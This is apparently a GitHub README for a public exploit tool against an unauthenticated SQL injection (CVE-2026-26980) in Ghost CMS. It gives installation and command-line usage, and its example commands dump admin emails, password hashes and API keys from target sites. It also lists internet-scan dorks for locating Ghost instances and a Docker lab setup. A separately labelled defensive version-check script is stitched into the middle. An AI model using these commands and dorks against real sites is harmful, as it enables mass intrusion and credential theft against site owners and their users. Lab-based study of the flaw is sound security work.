vognik/CVE-2026-26980

CVE-2026-26980 — 👻 Ghost CMS Unauthenticated SQLi via Content API

A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.

CVE: CVE-2026-26980
CVSS: 9.4 (Critical)
Affected: Ghost >= 3.24.0, <= 6.19.0
Fixed: 6.19.1
Disclosed: 2026-02-20
Credit: Nicholas Carlini
Public Exploit: vognik
Type: Unauthenticated SQLi via Content API → Arbitrary DB Read

Installation

git clone https://github.com/vognik/CVE-2026-26980.git
cd CVE-2026-26980
pip install -r ./requirements.txt

How to use

usage: main.py [-h] -u URL [-a KEY] [-p PATH] [-k] [-c MODE] [-d {sqlite,mysql}] [-T NAME] [-C COL1,COL2] [-t N] [-o FILE]

options:
  -h, --help            show this help message and exit

Connection settings:
  -u, --url URL         Set target Ghost instance URL
  -a, --api-key KEY     Set Content API key (skips auto-discovery)
  -p, --api-path PATH   Set Content API path (default: /ghost/api/content/)
  -k, --insecure        Skip SSL certificate verification

Extraction settings:
  -c, --check MODE      Verify vulnerability: passive (meta tags) or active (SQL error)
  -d, --dbms {sqlite,mysql}
                        Select database engine (default: sqlite)
  -T, --table NAME      Set database table to dump (e.g., users, api_keys)
  -C, --columns COL1,COL2
                        Set columns to extract (comma-separated)
  -t, --threads N       Set number of concurrent threads (default: 15)

Output settings:
  -o, --output FILE     Save results to the specified CSV file

Usage examples:
python3 main.py -u http://target.com
(Quickly extract admin email and password hash from a default SQLite setup)

python3 main.py -u http://target.com -c passive
(Check the site for the vulnerability using the meta tag on the main page)

python3 main.py -u http://target.com -d mysql -T users -C email,password -o ./result.csv
(Dump the "email" and "password" columns from the "users" table and save the result to "result.csv")

python3 main.py -u http://target.com -d mysql -T api_keys -t 25
(Dump all API keys from the "api_keys" table using 25 threads)

Note: Most production Ghost instances use MySQL. Local or small blogs use SQLite.
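
A defender's counterpart to the passive check, as an added example (not code from this repository): it reads the generator meta tag from the home page of a Ghost site you operate and compares it with the affected range stated above. It assumes the tag has the form "Ghost <major>.<minor>[.<patch>]"; the names classify and SAMPLES and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Range stated on this page: affected >= 3.24.0 and <= 6.19.0, fixed in 6.19.1.
FIRST_AFFECTED = (3, 24, 0)
LAST_AFFECTED = (6, 19, 0)

class _GeneratorTag(HTMLParser):
    """Collects the content of <meta name="generator"> (assumed tag name)."""

    def __init__(self):
        super().__init__()
        self.generator = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "generator":
            self.generator = self.generator or a.get("content")

def classify(html):
    """Return 'affected', 'not-affected', 'indeterminate' or 'unknown'."""
    parser = _GeneratorTag()
    parser.feed(html)
    m = re.fullmatch(r"Ghost (\d+)\.(\d+)(?:\.(\d+))?", (parser.generator or "").strip())
    if not m:
        return "unknown"  # tag missing or stripped: says nothing about the version
    major, minor = int(m.group(1)), int(m.group(2))
    if m.group(3) is None:
        # Only major.minor is advertised: bound the patch level from both sides.
        low, high = (major, minor, 0), (major, minor, float("inf"))
    else:
        low = high = (major, minor, int(m.group(3)))
    if FIRST_AFFECTED <= low and high <= LAST_AFFECTED:
        return "affected"
    if high < FIRST_AFFECTED or low > LAST_AFFECTED:
        return "not-affected"
    return "indeterminate"  # e.g. "6.19" covers both 6.19.0 and the fixed 6.19.1

# Constructed sample pages (not real sites), keyed by an internal asset name.
SAMPLES = {
    "blog-a": '<head><meta name="generator" content="Ghost 6.16"></head>',
    "blog-b": '<head><meta name="generator" content="Ghost 6.19"></head>',
    "blog-c": '<head><meta name="generator" content="Ghost 6.19.1"/></head>',
    "wiki": "<head><title>no generator tag</title></head>",
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(f"{name}: {classify(html)}")
```

An "indeterminate" or "unknown" result means the installed version has to be confirmed on the host itself, because the tag alone cannot separate 6.19.0 from 6.19.1.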

Dorks

Shodan http.html:"data-ghost="
Zoomeye http.body="data-ghost="
Fofa body="data-ghost="
Censys web.software.vendor = "ghost"

Lab Setup

sqlite

docker run -p 8080:2368 -e database__client=sqlite3 -e database__connection__filename=/var/lib/ghost/content/data/ghost.db -e url=http://localhost:2368 -e port=2368 ghost:6.16.1

mysql

cd lab
docker compose up

Original Research

Nicholas Carlini - Black-hat LLMs | [un]prompted 2026


📄 License

This project is licensed under the GPL-3.0 license.
See the LICENSE file for details.
